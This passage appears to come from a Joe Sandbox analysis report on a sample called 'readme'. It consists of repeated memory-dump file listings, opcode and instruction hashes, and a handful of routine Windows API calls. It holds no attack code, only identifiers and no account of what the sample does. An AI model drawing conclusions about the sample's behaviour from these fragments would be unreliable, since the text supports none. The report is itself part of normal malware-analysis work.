                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                                                                                          • Opcode ID: 395a1bfc07a86bc1b17be198384b933d6e74c24733d271f90db895820ae6568e
                                                                                                                                                                                                          • Instruction ID: e3b698b264220c6a4a7ff30e5bd10faba35ce6b07e42392d760f651db3adf898
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 395a1bfc07a86bc1b17be198384b933d6e74c24733d271f90db895820ae6568e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E46249716183419FC364CF29C980A6BB7E5FFC8304F148A2EE59997391D738E905CB9A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,?,004CE646,?,0041E572), ref: 004CE5B7
                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(00563D90,?,?,004CE646,?,0041E572), ref: 004CE607
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$InformationSystemZone
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 702727434-0
                                                                                                                                                                                                          • Opcode ID: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                          • Instruction ID: 027c201d87c87fe04e998a3dacbc9da3b97e28b55a26ca5f2fa1b84a2cf7f3f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9011D78608201DBC310BF09E85556BB7F9FB78B10FC0850AE48583321E3F68D88DB29
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00528C3A,-00000003), ref: 0052B447
                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012F9), ref: 0052B44E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                          • Opcode ID: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                          • Instruction ID: 2d67d1c8230b34df0e9697497b7d0e8b3de7afbebdcce056a4f33b586f436b97
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61B092B9604200ABDE009BA0AE0CB1BB678AB54702F000400B619C1160C630C804EB31
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: R
                                                                                                                                                                                                          • API String ID: 0-1968290334
                                                                                                                                                                                                          • Opcode ID: 8546aa269060c6db0e10336a880f1cd0ec7275522bd7a3a93064d1100faa0acd
                                                                                                                                                                                                          • Instruction ID: ce0d7d11e4424d034f190161494b7aac1bec0c29b2276794a3ebc18ef3406d1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8546aa269060c6db0e10336a880f1cd0ec7275522bd7a3a93064d1100faa0acd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84C1D1B2E041689AFB208A14DC84BFBB775FF95310F1480FAD84DA7641D6791EC28F66
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(00549E88,00000000,00000001,0054A654,?,?,?,004FB325,?,?,00000000,7772E820), ref: 004F9365
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                                                          • Opcode ID: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                          • Instruction ID: d33697237a28c181885f9fc6147cb760b8f27fbda8fa23562785bbd0682874fe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0823270111167D7288A2EEC45BE7B7D9AFD8710B05412ABD04D7280D7A0EC418594
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                          • Opcode ID: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                          • Instruction ID: 055774edfa36a1cc0f2afeca4167b9a8919af704cd7fbd49c209ae17ea6089f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0C22C0042804EE7608F38A90AB593BB1AB65244F8804DCD4E443213D3B9021FE766
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: dc5a42f13e7841349ae14dd0d814db7469e84fc1a093c776fc8443455eaf0811
                                                                                                                                                                                                          • Instruction ID: 01d32cbd04fd490b405bbb3076ca95c53af9ac6c7c72bf4527c2ddcebbd18577
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc5a42f13e7841349ae14dd0d814db7469e84fc1a093c776fc8443455eaf0811
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D58269703083119FD714DF29E580B6BB7E5BB98708F84895EE8898B341D738EC56CB5A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a904873dfafe76d50723d2220b700b55706c147e6e180d2363eb77a360958730
                                                                                                                                                                                                          • Instruction ID: 96a45275b5f9c73a41d1d8337e9608839c2e373e62523567d3dab65913c056f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a904873dfafe76d50723d2220b700b55706c147e6e180d2363eb77a360958730
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1212AF71608B019BC714DF69C890AABB3F5BF88304F444A2EF585C3741E778E949CB9A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 04095868b29765f6348be8197726760830473c8083571c9ba6bc4c95f4dee8ec
                                                                                                                                                                                                          • Instruction ID: 498cbeb692f4c70c8915f573c8722a097fb1111c7146c1bbe368278cd5f5e3e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04095868b29765f6348be8197726760830473c8083571c9ba6bc4c95f4dee8ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F02CE71A04B049FD310CF29E84679AB7F5FFD8304F04892EF4CA96691D7B8E4699B09
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
